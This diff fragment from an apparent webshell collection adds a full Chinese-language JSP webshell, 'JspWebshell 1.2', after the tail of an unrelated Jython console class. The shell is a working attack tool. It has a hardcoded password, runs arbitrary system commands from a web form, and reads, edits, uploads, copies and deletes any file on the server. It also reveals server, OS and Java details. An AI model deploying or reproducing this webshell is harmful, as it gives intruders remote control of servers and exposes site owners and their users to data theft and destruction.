int tbs = 4;
|
||||
|
||||
String line = "";
|
||||
String command = "";
|
||||
|
||||
for (;;) {
|
||||
String space = "";
|
||||
for (int i = 0; i < pos * tbs; i++) {
|
||||
space += " ";
|
||||
}
|
||||
|
||||
try {
|
||||
console.setTextAttributes(new TextAttributes(colorCursor));
|
||||
|
||||
if (pos > 0) {
|
||||
out.print(space + "... ");
|
||||
} else {
|
||||
out.print(">> ");
|
||||
}
|
||||
|
||||
console.setTextAttributes(new TextAttributes(colorForeground));
|
||||
|
||||
line = console.readLine().trim();
|
||||
if (line.length() == 0 && pos > 0) {
|
||||
pos--;
|
||||
} else if (line.endsWith(":")) {
|
||||
command += space + line + "\n";
|
||||
pos++;
|
||||
} else {
|
||||
command += space + line + "\n";
|
||||
}
|
||||
|
||||
if (pos == 0) {
|
||||
interp.exec(command);
|
||||
command = "";
|
||||
}
|
||||
} catch (Exception e) {
|
||||
console.setTextAttributes(new TextAttributes(colorError));
|
||||
|
||||
e.printStackTrace();
|
||||
command = "";
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
public static void main(String[] argv) {
|
||||
PySystemState.initialize(System.getProperties(), null, argv);
|
||||
|
||||
JFrame frame = new JFrame("Jython Console");
|
||||
JythonShell console = new JythonShell();
|
||||
|
||||
frame.add(console, BorderLayout.CENTER);
|
||||
frame.pack();
|
||||
frame.setVisible(true);
|
||||
frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
|
||||
|
||||
console.run();
|
||||
}
|
||||
}
|
788
xakep-shells/JSP/JspWebshell 1.2.jsp.txt
Normal file
788
xakep-shells/JSP/JspWebshell 1.2.jsp.txt
Normal file
|
@ -0,0 +1,788 @@
|
|||
<%@ page contentType="text/html; charset=GBK" language="java" import="java.sql.*,java.io.File,java.io.*,java.nio.charset.Charset,java.io.IOException,java.util.*" errorPage="" %>
|
||||
<%
|
||||
/**
|
||||
* <p>Title:JspWebshell </p>
|
||||
*
|
||||
* <p>Description: jsp网站管理</p>
|
||||
*
|
||||
* <p>Copyright:绝对零度[B.C.T] Copyright (c) 2006</p>
|
||||
*
|
||||
* <p>Company: zero.cnbct.org</p>
|
||||
* PS:本程序是小弟处于兴趣所写,如有疑问请联系QQ:48124012
|
||||
* @version 1.2
|
||||
*/
|
||||
String path="";
|
||||
String selfName="";
|
||||
boolean copyfinish=false;
|
||||
%>
|
||||
<% selfName=request.getRequestURI();
|
||||
// String editfile="";
|
||||
String editfile=request.getParameter("editfile");
|
||||
if (editfile!=null)
|
||||
{editfile=new String(editfile.getBytes("ISO8859_1"));
|
||||
}
|
||||
path=request.getParameter("path");
|
||||
if(path==null)
|
||||
path=config.getServletContext().getRealPath("/");
|
||||
%>
|
||||
<%!
|
||||
String _password ="111";//密码
|
||||
public String readAllFile(String filePathName) throws IOException
|
||||
{
|
||||
FileReader fr = new FileReader(filePathName);
|
||||
int count = fr.read();
|
||||
String res="";
|
||||
while(count != -1)
|
||||
{
|
||||
//System.out.print((char)count);
|
||||
res=res+(char)count;
|
||||
count = fr.read();
|
||||
if(count == 13)
|
||||
{
|
||||
fr.skip(1);
|
||||
}
|
||||
}
|
||||
fr.close();
|
||||
return res;
|
||||
}
|
||||
public void writeFile(String filePathName,String args) throws IOException
|
||||
{
|
||||
FileWriter fw = new FileWriter(filePathName);
|
||||
PrintWriter out=new PrintWriter(fw);
|
||||
out.write(args);
|
||||
out.println();
|
||||
out.flush();
|
||||
fw.close();
|
||||
out.close();
|
||||
}
|
||||
public boolean createFile(String filePathName) throws IOException
|
||||
{
|
||||
boolean result = false;
|
||||
File file = new File(filePathName);
|
||||
if(file.exists())
|
||||
{
|
||||
System.out.println("文件已经存在!");
|
||||
}
|
||||
else
|
||||
{
|
||||
file.createNewFile();
|
||||
result = true;
|
||||
System.out.println("文件已经创建!");
|
||||
}
|
||||
return result;
|
||||
}
|
||||
public boolean createFolder(String fileFolderName)
|
||||
{
|
||||
boolean result = false;
|
||||
try
|
||||
{
|
||||
File file = new File(fileFolderName);
|
||||
if(file.exists())
|
||||
{
|
||||
//file.delete();
|
||||
System.out.println("目录已经存在!");
|
||||
result = true;
|
||||
}
|
||||
else
|
||||
{
|
||||
file.mkdir();
|
||||
System.out.println("目录已经建立!");
|
||||
result = true;
|
||||
}
|
||||
}
|
||||
catch(Exception ex)
|
||||
{
|
||||
result = false;
|
||||
System.out.println("CreateAndDeleteFolder is error:"+ex);
|
||||
}
|
||||
return result;
|
||||
}
|
||||
|
||||
public boolean DeleteFolder(String filefolderName)
|
||||
{
|
||||
boolean result = false;
|
||||
try
|
||||
{
|
||||
File file = new File(filefolderName);
|
||||
if(file.exists())
|
||||
{
|
||||
file.delete();
|
||||
System.out.println("目录已删除!");
|
||||
result = true;
|
||||
}
|
||||
}
|
||||
catch(Exception ex)
|
||||
{
|
||||
result = false;
|
||||
System.out.println("CreateAndDeleteFolder is error:"+ex);
|
||||
}
|
||||
return result;
|
||||
}
|
||||
public boolean validate(String password) {
|
||||
if (password.equals(_password)) {
|
||||
return true;
|
||||
} else {
|
||||
return false;
|
||||
}
|
||||
}
|
||||
public String HTMLEncode(String str) {
|
||||
str = str.replaceAll(" ", " ");
|
||||
str = str.replaceAll("<", "<");
|
||||
str = str.replaceAll(">", ">");
|
||||
str = str.replaceAll("\r\n", "<br>");
|
||||
|
||||
return str;
|
||||
}
|
||||
public String exeCmd(String cmd) {
|
||||
Runtime runtime = Runtime.getRuntime();
|
||||
Process proc = null;
|
||||
String retStr = "";
|
||||
InputStreamReader insReader = null;
|
||||
char[] tmpBuffer = new char[1024];
|
||||
int nRet = 0;
|
||||
|
||||
try {
|
||||
proc = runtime.exec(cmd);
|
||||
insReader = new InputStreamReader(proc.getInputStream(), Charset.forName("GB2312"));
|
||||
while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) {
|
||||
retStr += new String(tmpBuffer, 0, nRet);
|
||||
}
|
||||
|
||||
insReader.close();
|
||||
retStr = HTMLEncode(retStr);
|
||||
} catch (Exception e) {
|
||||
retStr = "<font color=\"red\">命令错误\"" + cmd + "\"";
|
||||
} finally {
|
||||
return retStr;
|
||||
}
|
||||
}
|
||||
public boolean fileCopy(String srcPath, String dstPath) {
|
||||
boolean bRet = true;
|
||||
|
||||
try {
|
||||
FileInputStream in = new FileInputStream(new File(srcPath));
|
||||
FileOutputStream out = new FileOutputStream(new File(dstPath));
|
||||
byte[] buffer = new byte[1024];
|
||||
int nBytes;
|
||||
|
||||
|
||||
while ((nBytes = in.read(buffer, 0, 1024)) != -1) {
|
||||
out.write(buffer, 0, nBytes);
|
||||
}
|
||||
|
||||
in.close();
|
||||
out.close();
|
||||
} catch (IOException e) {
|
||||
bRet = false;
|
||||
}
|
||||
|
||||
return bRet;
|
||||
}
|
||||
class EnvServlet
|
||||
{
|
||||
public long timeUse=0;
|
||||
public Hashtable htParam=new Hashtable();
|
||||
private Hashtable htShowMsg=new Hashtable();
|
||||
public void setHashtable()
|
||||
{
|
||||
Properties me=System.getProperties();
|
||||
Enumeration em=me.propertyNames();
|
||||
while(em.hasMoreElements())
|
||||
{
|
||||
String strKey=(String)em.nextElement();
|
||||
String strValue=me.getProperty(strKey);
|
||||
htParam.put(strKey,strValue);
|
||||
}
|
||||
}
|
||||
public void getHashtable(String strQuery)
|
||||
{
|
||||
Enumeration em=htParam.keys();
|
||||
while(em.hasMoreElements())
|
||||
{
|
||||
String strKey=(String)em.nextElement();
|
||||
String strValue=new String();
|
||||
if(strKey.indexOf(strQuery,0)>=0)
|
||||
{
|
||||
strValue=(String)htParam.get(strKey);
|
||||
htShowMsg.put(strKey,strValue);
|
||||
}
|
||||
}
|
||||
}
|
||||
public String queryHashtable(String strKey)
|
||||
{
|
||||
strKey=(String)htParam.get(strKey);
|
||||
return strKey;
|
||||
}
|
||||
/* public long test_int()
|
||||
{
|
||||
long timeStart = System.currentTimeMillis();
|
||||
int i=0;
|
||||
while(i<3000000)i++;
|
||||
long timeEnd = System.currentTimeMillis();
|
||||
long timeUse=timeEnd-timeStart;
|
||||
return timeUse;
|
||||
}
|
||||
public long test_sqrt()
|
||||
{
|
||||
long timeStart = System.currentTimeMillis();
|
||||
int i=0;
|
||||
double db=(double)new Random().nextInt(1000);
|
||||
while(i<200000){db=Math.sqrt(db);i++;}
|
||||
long timeEnd = System.currentTimeMillis();
|
||||
long timeUse=timeEnd-timeStart;
|
||||
return timeUse;
|
||||
}*/
|
||||
}
|
||||
%>
|
||||
<%
|
||||
EnvServlet env=new EnvServlet();
|
||||
env.setHashtable();
|
||||
//String action=new String(" ");
|
||||
//String act=new String("action");
|
||||
//if(request.getQueryString()!=null&&request.getQueryString().indexOf(act,0)>=0)action=request.getParameter(act);
|
||||
%>
|
||||
|
||||
<html>
|
||||
<head>
|
||||
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
|
||||
<title>JspWebShell By 绝对零度</title>
|
||||
<style>
|
||||
body {
|
||||
font-size: 12px;
|
||||
font-family: "宋体";
|
||||
background-color: #666666;
|
||||
}
|
||||
A {
|
||||
COLOR: black; TEXT-DECORATION: none
|
||||
}
|
||||
A:hover {
|
||||
COLOR: black; TEXT-DECORATION: underline; none:
|
||||
}
|
||||
td {
|
||||
font-size: 12px;
|
||||
font-family: "宋体";
|
||||
color: #000000;
|
||||
}
|
||||
|
||||
input.textbox {
|
||||
border: black solid 1;
|
||||
font-size: 12px;
|
||||
height: 18px;
|
||||
}
|
||||
|
||||
input.button {
|
||||
font-size: 12px;
|
||||
font-family: "宋体";
|
||||
border: black solid 1;
|
||||
}
|
||||
|
||||
td.datarows {
|
||||
font-size: 12px;
|
||||
font-family: "宋体";
|
||||
height: 25px;
|
||||
color: #000000;
|
||||
}
|
||||
.PicBar { background-color: #f58200; border: 1px solid #000000; height: 12px;}
|
||||
textarea {
|
||||
border: black solid 1;
|
||||
}
|
||||
.inputLogin {font-size: 9pt;border:1px solid lightgrey;background-color: lightgrey;}
|
||||
.table1 {BORDER:gray 0px ridge;}
|
||||
.td2 {BORDER-RIGHT:#ffffff 0px solid;BORDER-TOP:#ffffff 1px solid;BORDER-LEFT:#ffffff 1px solid;BORDER-BOTTOM:#ffffff 0px solid;BACKGROUND-COLOR:lightgrey; height:18px;}
|
||||
.tr1 {BACKGROUND-color:gray }
|
||||
</style>
|
||||
<script language="JavaScript" type="text/JavaScript">
|
||||
<!--
|
||||
function MM_reloadPage(init) { //reloads the window if Nav4 resized
|
||||
if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
|
||||
document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
|
||||
else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
|
||||
}
|
||||
MM_reloadPage(true);
|
||||
//-->
|
||||
</script>
|
||||
</head>
|
||||
<body bgcolor="#666666">
|
||||
<%
|
||||
//session.setMaxInactiveInterval(_sessionOutTime * 60);
|
||||
String password=request.getParameter("password");
|
||||
if (password == null && session.getAttribute("password") == null) {
|
||||
|
||||
%>
|
||||
|
||||
<div align="center" style="position:absolute;width:100%;visibility:show; z-index:0;left:4px;top:272px">
|
||||
<TABLE class="table1" cellSpacing="1" cellPadding="1" width="473" border="0" align="center">
|
||||
<tr>
|
||||
<td class="tr1"> <TABLE cellSpacing="0" cellPadding="0" width="468" border="0">
|
||||
<tr>
|
||||
<TD align="left" bgcolor="#333333"><FONT face="webdings" color="#ffffff"> 8</FONT><FONT face="Verdana, Arial, Helvetica, sans-serif" color="#ffffff"><b>JspWebShell
|
||||
version 1.2管理登录 :::...</b></font></TD>
|
||||
<TD align="right" bgcolor="#333333"><FONT color="#d2d8ec">Power By
|
||||
绝对零度</FONT></TD>
|
||||
</tr>
|
||||
<form name="bctform" method="post">
|
||||
<tr bgcolor="#999999">
|
||||
<td height="30" colspan="2" align="center" class="td2">
|
||||
<input name="password" type="password" class="textbox" id="Textbox" />
|
||||
<input type="submit" name="Button" value="Login" id="Button" title="Click here to login" class="button" />
|
||||
</td>
|
||||
</tr>
|
||||
</form>
|
||||
</TABLE></td>
|
||||
</tr>
|
||||
</TABLE>
|
||||
</div>
|
||||
<%
|
||||
|
||||
} else {
|
||||
|
||||
if (session.getAttribute("password") == null) {
|
||||
|
||||
if (validate(password) == false) {
|
||||
out.println("<div align=\"center\"><font color=\"red\"><li>密码错误</font></div>");
|
||||
out.close();
|
||||
return;
|
||||
}
|
||||
|
||||
session.setAttribute("password", password);
|
||||
} else {
|
||||
password = (String)session.getAttribute("password");
|
||||
}
|
||||
%>
|
||||
<%
|
||||
File tmpFile = null;
|
||||
String delfile="";
|
||||
String delfile1="";
|
||||
String editpath="";
|
||||
delfile1=request.getParameter("delfile");
|
||||
editpath=request.getParameter("filepath");
|
||||
if (delfile1!=null)
|
||||
{delfile=new String(delfile1.getBytes("ISO8859_1"));
|
||||
}
|
||||
if ( delfile1!= null) {
|
||||
// out.print(delfile);
|
||||
tmpFile = new File(delfile);
|
||||
if (! tmpFile.delete()) {
|
||||
out.print( "<font color=\"red\">删除失败</font><br>\n");
|
||||
}
|
||||
}
|
||||
%>
|
||||
<%String editfilecontent=null;
|
||||
String editfilecontent1=request.getParameter("content");
|
||||
// out.println(editfilecontent1);
|
||||
//String save=request.getParameter("save");
|
||||
if (editfilecontent1!=null)
|
||||
{editfilecontent=new String(editfilecontent1.getBytes("ISO8859_1"));}
|
||||
// out.print(editfile);
|
||||
//out.print(editfilecontent);
|
||||
if (editfile!=null&editfilecontent!=null)
|
||||
{try {writeFile(editfile,editfilecontent);}
|
||||
catch (Exception e) {out.print("写入失败");}
|
||||
out.print("写入成功");
|
||||
}
|
||||
%>
|
||||
<%request.setCharacterEncoding("GBK");%>
|
||||
<%//String editfile=request.getParameter("editfile");
|
||||
//out.print(editfile);
|
||||
if (request.getParameter("jsptz")!=null)
|
||||
{%>
|
||||
<div id="Layer2" style="position:absolute; left:9px; top:340px; width:725px; height:59px; z-index:2">
|
||||
<CENTER>
|
||||
<table border="0" cellpadding="0" cellspacing="1" class="tableBorder">
|
||||
<tr>
|
||||
<td height="22" align="center" bgcolor="#000000" ><font color=#FFFFFF><strong>服务器相关参数</strong></font>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td style="display" id='submenu0'><table border=0 width=100% cellspacing=1 cellpadding=3 bgcolor="#FFFFFF">
|
||||
<tr bgcolor="#999999" height="22">
|
||||
<td width="130" bgcolor="#999999"> 服务器名</td>
|
||||
<td height="22" colspan="3"> <%= request.getServerName() %>(<%=request.getRemoteAddr()%>)</td>
|
||||
</tr>
|
||||
<tr bgcolor="#999999" height="22">
|
||||
<td> 服务器操作系统</td>
|
||||
<td colspan="3"> <%=env.queryHashtable("os.name")%> <%=env.queryHashtable("os.version")%>
|
||||
<%=env.queryHashtable("sun.os.patch.level")%></td>
|
||||
</tr>
|
||||
<tr bgcolor="#999999" height="22">
|
||||
<td> 服务器操作系统类型</td>
|
||||
<td> <%=env.queryHashtable("os.arch")%></td>
|
||||
<td> 服务器操作系统模式</td>
|
||||
<td> <%=env.queryHashtable("sun.arch.data.model")%>位</td>
|
||||
</tr>
|
||||
<tr bgcolor="#999999" height="22">
|
||||
<td> 服务器所在地区</td>
|
||||
<td> <%=env.queryHashtable("user.country")%></td>
|
||||
<td> 服务器语言</td>
|
||||
<td> <%=env.queryHashtable("user.language")%></td>
|
||||
</tr>
|
||||
<tr bgcolor="#999999" height="22">
|
||||
<td> 服务器时区</td>
|
||||
<td> <%=env.queryHashtable("user.timezone")%></td>
|
||||
<td> 服务器时间</td>
|
||||
<td> <%=new java.util.Date()%> </td>
|
||||
</tr>
|
||||
<tr bgcolor="#999999" height="22">
|
||||
<td> 服务器解译引擎</td>
|
||||
<td width="170"> <%= getServletContext().getServerInfo() %></td>
|
||||
<td width="130"> 服务器端口</td>
|
||||
<td width="170"> <%= request.getServerPort() %></td>
|
||||
</tr>
|
||||
<tr bgcolor="#999999" height="22">
|
||||
<td height="22"> 当前用户</td>
|
||||
<td height="22" colspan="3"> <%=env.queryHashtable("user.name")%></td>
|
||||
</tr>
|
||||
<tr bgcolor="#999999" height="22">
|
||||
<td> 用户目录</td>
|
||||
<td colspan="3"> <%=env.queryHashtable("user.dir")%></td>
|
||||
</tr>
|
||||
<tr bgcolor="#999999" height="22">
|
||||
<td align=left> 本文件实际路径</td>
|
||||
<td height="8" colspan="3"> <%=request.getRealPath(request.getServletPath())%></td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
<br>
|
||||
<table width="640" border="0" cellpadding="0" cellspacing="1" class="tableBorder">
|
||||
<tr>
|
||||
<td width="454" height="22" align="center" bgcolor="#000000" onclick="showsubmenu(1)"><font color=#FFFFFF><strong>JAVA相关参数</strong></font>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td style="display" id='submenu1'>
|
||||
<table border=0 width=99% cellspacing=1 cellpadding=3 bgcolor="#FFFFFF">
|
||||
<tr bgcolor="#666666" height="22">
|
||||
<td width="30%"> 名称</td>
|
||||
<td width="50%" height="22"> 英文名称</td>
|
||||
<td width="20%" height="22"> 版本</td>
|
||||
</tr>
|
||||
<tr bordercolor="#FFFFFF" bgcolor="#999999" height="22">
|
||||
<td width="30%"> JAVA运行环境名称</td>
|
||||
<td width="50%" height="22"> <%=env.queryHashtable("java.runtime.name")%></td>
|
||||
<td width="20%" height="22"> <%=env.queryHashtable("java.runtime.version")%></td>
|
||||
</tr>
|
||||
<tr bordercolor="#FFFFFF" bgcolor="#999999" height="22">
|
||||
<td width="30%"> JAVA运行环境说明书名称</td>
|
||||
<td width="50%" height="22"> <%=env.queryHashtable("java.specification.name")%></td>
|
||||
<td width="20%" height="22"> <%=env.queryHashtable("java.specification.version")%></td>
|
||||
</tr>
|
||||
<tr bordercolor="#FFFFFF" bgcolor="#999999" height="22">
|
||||
<td width="30%"> JAVA虚拟机名称</td>
|
||||
<td width="50%" height="22"> <%=env.queryHashtable("java.vm.name")%></td>
|
||||
<td width="20%" height="22"> <%=env.queryHashtable("java.vm.version")%></td>
|
||||
</tr>
|
||||
<tr bordercolor="#FFFFFF" bgcolor="#999999" height="22">
|
||||
<td width="30%"> JAVA虚拟机说明书名称</td>
|
||||
<td width="50%" height="22"> <%=env.queryHashtable("java.vm.specification.name")%></td>
|
||||
<td width="20%" height="22"> <%=env.queryHashtable("java.vm.specification.version")%></td>
|
||||
</tr>
|
||||
<%
|
||||
float fFreeMemory=(float)Runtime.getRuntime().freeMemory();
|
||||
float fTotalMemory=(float)Runtime.getRuntime().totalMemory();
|
||||
float fPercent=fFreeMemory/fTotalMemory*100;
|
||||
%>
|
||||
<tr bordercolor="#FFFFFF" bgcolor="#999999" height="22">
|
||||
<td height="22"> JAVA虚拟机剩余内存:</td>
|
||||
<td height="22" colspan="2"><img width='8' height="12" align=absmiddle class=PicBar style="background-color: #000000"> <%=fFreeMemory/1024/1024%>M
|
||||
</td>
|
||||
</tr>
|
||||
<tr bordercolor="#FFFFFF" bgcolor="#999999" height="22">
|
||||
<td height="22"> JAVA虚拟机分配内存</td>
|
||||
<td height="22" colspan="2"><img width='85%' align=absmiddle class=PicBar style="background-color: #000000"> <%=fTotalMemory/1024/1024%>M
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
<table border=0 width=99% cellspacing=1 cellpadding=3 bgcolor="#FFFFFF">
|
||||
<tr bgcolor="#666666" height="22">
|
||||
<td width="30%"> 参数名称</td>
|
||||
<td width="70%" height="22"> 参数路径</td>
|
||||
</tr>
|
||||
<tr bgcolor="#999999" height="22">
|
||||
<td width="30%"> java.class.path </td>
|
||||
<td width="70%" height="22"> <%=env.queryHashtable("java.class.path").replaceAll(env.queryHashtable("path.separator"),env.queryHashtable("path.separator")+"<br> ")%>
|
||||
</td>
|
||||
</tr>
|
||||
<tr bgcolor="#999999" height="22">
|
||||
<td width="30%"> java.home</td>
|
||||
<td width="70%" height="22"> <%=env.queryHashtable("java.home")%></td>
|
||||
</tr>
|
||||
<tr bgcolor="#999999" height="22">
|
||||
<td width="30%"> java.endorsed.dirs</td>
|
||||
<td width="70%" height="22"> <%=env.queryHashtable("java.endorsed.dirs")%></td>
|
||||
</tr>
|
||||
<tr bgcolor="#999999" height="22">
|
||||
<td width="30%"> java.library.path</td>
|
||||
<td width="70%" height="22"> <%=env.queryHashtable("java.library.path").replaceAll(env.queryHashtable("path.separator"),env.queryHashtable("path.separator")+"<br> ")%>
|
||||
</td>
|
||||
</tr>
|
||||
<tr bgcolor="#999999" height="22">
|
||||
<td width="30%"> java.io.tmpdir</td>
|
||||
<td width="70%" height="22"> <%=env.queryHashtable("java.io.tmpdir")%></td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
<br>
|
||||
<div id="testspeed" align="center"> </div>
|
||||
</CENTER></div>
|
||||
|
||||
<%}
|
||||
else{
|
||||
if (editfile!=null)//if edit
|
||||
{
|
||||
%>
|
||||
<div id="Layer1" style="position:absolute; left:-17px; top:1029px; width:757px; height:250px; z-index:1">
|
||||
<table width="99%" height="232" border="0">
|
||||
<tr>
|
||||
<td height="226"><form name="form2" method="post" action="">
|
||||
<p align="center"> 地址:
|
||||
<input name="editfile" type="text" value="<%=editfile%>" size="50">
|
||||
</p>
|
||||
<p align="center">
|
||||
<textarea name="content" cols="105" rows="30"><%=readAllFile(editfile)%></textarea>
|
||||
<input type="submit" name="Submit2" value="保存">
|
||||
</p>
|
||||
</form> </td>
|
||||
</tr>
|
||||
</table>
|
||||
<p> </p></div>
|
||||
<%}
|
||||
else{%>
|
||||
|
||||
<table border="1" width="770" cellpadding="4" bordercolorlight="#999999" bordercolordark="#ffffff" align="center" cellspacing="0">
|
||||
<tr bgcolor="#333333">
|
||||
<td colspan="4" align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif" color="#ffffff">JspWebShell
|
||||
version 1.0</font><font color="#FFFFFF">(网站目录:<%=config.getServletContext().getRealPath("/")%>)</font></td>
|
||||
</tr>
|
||||
<tr bgcolor="#999999">
|
||||
<td colspan="4"> <font color="#000000">
|
||||
<%
|
||||
File[] fs = File.listRoots();
|
||||
for (int i = 0; i < fs.length; i++){
|
||||
%>
|
||||
<a href="<%=selfName %>?path=<%=fs[i].getPath()%>\">本地磁盘(<%=fs[i].getPath()%>)
|
||||
</a>
|
||||
<%}%>
|
||||
</font></td>
|
||||
</tr>
|
||||
<tr bgcolor="#999999">
|
||||
<td height="10" colspan="4"> <font color="#000000">
|
||||
<form name="form1" method="post" action="">
|
||||
<input type="text" name="command" class="button">
|
||||
<input type="submit" name="Submit" value="CMD命令执行" class="button">
|
||||
</form>
|
||||
</font> <p>
|
||||
<%
|
||||
String cmd = "";
|
||||
InputStream ins = null;
|
||||
String result = "";
|
||||
if (request.getParameter("command") != null) {
|
||||
cmd = (String)request.getParameter("command");result = exeCmd(cmd);%>
|
||||
<%=result == "" ? " " : result%>
|
||||
<%}%>
|
||||
</td>
|
||||
</tr>
|
||||
<FORM METHOD="POST" ACTION="?up=true&path=<%String path1=config.getServletContext().getRealPath("/"); String tempfilepath=request.getParameter("path"); if(tempfilepath!=null) path1=tempfilepath;path1=path1.replaceAll("\\\\", "\\\\\\\\"); %><%=path1%>" ENCTYPE="multipart/form-data">
|
||||
<tr bgcolor="#999999">
|
||||
<td colspan="2"> <INPUT TYPE="FILE" NAME="FILE1" style="width:150" SIZE="50" class="button">
|
||||
<INPUT TYPE="SUBMIT" VALUE="上传" class="button"> </td>
|
||||
<td colspan="2"><a href="?jsptz=true" target="_blank">JSP探针</a> </td>
|
||||
</tr>
|
||||
</FORM>
|
||||
<% String fileexe="";
|
||||
String dir="";
|
||||
String deldir="";
|
||||
String scrfile="";
|
||||
String dstfile="";
|
||||
fileexe=request.getParameter("fileexe");
|
||||
dir=request.getParameter("dir");
|
||||
deldir=request.getParameter("deldir");
|
||||
scrfile=request.getParameter("scrfile");
|
||||
dstfile=request.getParameter("dstfile");
|
||||
if (fileexe!=null)
|
||||
{
|
||||
//out.print(path+fileexe);
|
||||
createFile(path+fileexe);
|
||||
}
|
||||
if (dir!=null)
|
||||
{
|
||||
//out.print(path+dir);
|
||||
createFolder(path+dir);
|
||||
}
|
||||
if (deldir!=null)
|
||||
{
|
||||
//out.print(deldir);
|
||||
DeleteFolder(deldir);
|
||||
}
|
||||
if (scrfile!=null&dstfile!=null)
|
||||
{
|
||||
//out.print(scrfile);
|
||||
//out.print(dstfile);
|
||||
copyfinish=fileCopy(scrfile, dstfile) ;
|
||||
}
|
||||
%>
|
||||
<tr bgcolor="#CCCCCC">
|
||||
<td height="10" colspan="2" bgcolor="#999999"> <form name="form3" method="post" action="">
|
||||
文件夹名:
|
||||
<input name="dir" type="text" size="10" class="button">
|
||||
<input type="submit" name="Submit3" value="新建目录" class="button">
|
||||
</form></td>
|
||||
<td width="188" height="10" bgcolor="#999999"> <form name="form4" method="post" action="">
|
||||
文件名:
|
||||
<input name="fileexe" type="text" size="8" class="button">
|
||||
<input type="submit" name="Submit4" value="新建文件" class="button">
|
||||
</form></td>
|
||||
<td width="327" height="10" bgcolor="#999999"><form name="form5" method="post" action="">
|
||||
文件<input name="scrfile" type="text" size="15"class="button">
|
||||
复制到
|
||||
<input name="dstfile" type="text" size="15" class="button">
|
||||
<input type="submit" name="Submit5" value="复制" class="button">
|
||||
</form><font color="#FF0000"><%if(copyfinish==true) out.print("复制成功");%></font></td>
|
||||
</tr>
|
||||
<%//上传
|
||||
String tempfilename="";
|
||||
String up=request.getParameter("up");
|
||||
// String tempfilepath=request.getParameter("filepath");
|
||||
// out.print(tempfilepath);
|
||||
if(up!=null)
|
||||
{
|
||||
tempfilename=(String)session.getId();
|
||||
//String tempfilename=request.getParameter("file");
|
||||
File f1=new File(tempfilepath,tempfilename);
|
||||
int n;
|
||||
try
|
||||
{
|
||||
InputStream in=request.getInputStream();
|
||||
BufferedInputStream my_in=new BufferedInputStream(in);
|
||||
FileOutputStream fout=new FileOutputStream(f1);
|
||||
BufferedOutputStream my_out=new BufferedOutputStream(fout);
|
||||
byte[] b=new byte[10000];
|
||||
while((n=my_in.read(b))!=-1)
|
||||
{
|
||||
my_out.write(b,0,n);
|
||||
}
|
||||
my_out.flush();
|
||||
my_out.close();
|
||||
fout.close();
|
||||
my_in.close();
|
||||
in.close();
|
||||
// out.print("文件创建成功!<br>");
|
||||
}
|
||||
catch(IOException e)
|
||||
{
|
||||
out.print("文件创建失败!");
|
||||
}
|
||||
|
||||
try
|
||||
{
|
||||
RandomAccessFile random1=new RandomAccessFile(f1,"r");
|
||||
random1.readLine();
|
||||
String filename=random1.readLine();
|
||||
byte[] b=filename.getBytes("ISO-8859-1");
|
||||
filename=new String(b);
|
||||
int pointer=filename.lastIndexOf('\\');
|
||||
filename=filename.substring(pointer+1,filename.length()-1);
|
||||
File f2=new File(tempfilepath,filename);
|
||||
RandomAccessFile random2=new RandomAccessFile(f2,"rw");
|
||||
random1.seek(0);
|
||||
for(int i=1; i<=4; i++)
|
||||
{
|
||||
String tempstr=random1.readLine();
|
||||
}
|
||||
long startPoint=random1.getFilePointer();
|
||||
random1.seek(random1.length());
|
||||
long mark=random1.getFilePointer();
|
||||
int j=0;
|
||||
long endPoint=0;
|
||||
while((mark>=0)&&(j<=5))
|
||||
{
|
||||
mark--;
|
||||
random1.seek(mark);
|
||||
n=random1.readByte();
|
||||
if(n=='\n')
|
||||
|
||||
{
|
||||
j++;
|
||||
endPoint=random1.getFilePointer();
|
||||
}
|
||||
}
|
||||
long length=endPoint-startPoint+1;
|
||||
int order=(int)(length/10000);
|
||||
int left=(int)(length%10000);
|
||||
byte[] c=new byte[10000];
|
||||
random1.seek(startPoint);
|
||||
for(int i=0; i<order; i++)
|
||||
{
|
||||
random1.read(c);
|
||||
random2.write(c);
|
||||
}
|
||||
random1.read(c,0,left);
|
||||
random2.write(c,0,left);
|
||||
random1.close();
|
||||
random2.close();
|
||||
f1.delete();
|
||||
out.print("文件上传成功!");
|
||||
}
|
||||
catch(Exception e)
|
||||
{
|
||||
out.print("文件上传失败!");
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
%>
|
||||
<tr>
|
||||
<td width="196" height="48" valign="top" bgcolor="#999999">
|
||||
<% try {
|
||||
//path=request.getParameter("path");
|
||||
//if(path==null)
|
||||
//path=config.getServletContext().getRealPath("/");
|
||||
File f=new File(path);
|
||||
File[] fList= f.listFiles() ;
|
||||
for (int j=0;j<fList.length;j++)
|
||||
{
|
||||
if (fList[j].isDirectory())
|
||||
{%>
|
||||
<a href="<%=selfName %>?path=<%=path%><%=fList[j].getName()%>\"> <%=fList[j].getName()%></a> <a href="?path=<%=path%>&deldir=<%=path%><%=fList[j].getName()%>">删除</a><br>
|
||||
<% }
|
||||
|
||||
}//for
|
||||
} catch (Exception e) {
|
||||
System.out.println("不存在或没有权限");
|
||||
}
|
||||
%>
|
||||
</td>
|
||||
<td colspan="3" valign="top" bgcolor="#999999">
|
||||
<% try {
|
||||
path=request.getParameter("path");
|
||||
if(path==null)
|
||||
path=config.getServletContext().getRealPath("/");
|
||||
File f=new File(path);
|
||||
File[] fList= f.listFiles() ;
|
||||
for (int j=0;j<fList.length;j++)
|
||||
{
|
||||
if (fList[j].isFile())
|
||||
{//request.getContextPath()得到虚拟路径%>
|
||||
<%=fList[j].getName()%>
|
||||
<a href="?path=<%String tempfilepath1=request.getParameter("path"); if(tempfilepath!=null) path=tempfilepath;%><%=path%>&editfile=<%=path%><%=fList[j].getName()%>" target="_blank">编辑</a>
|
||||
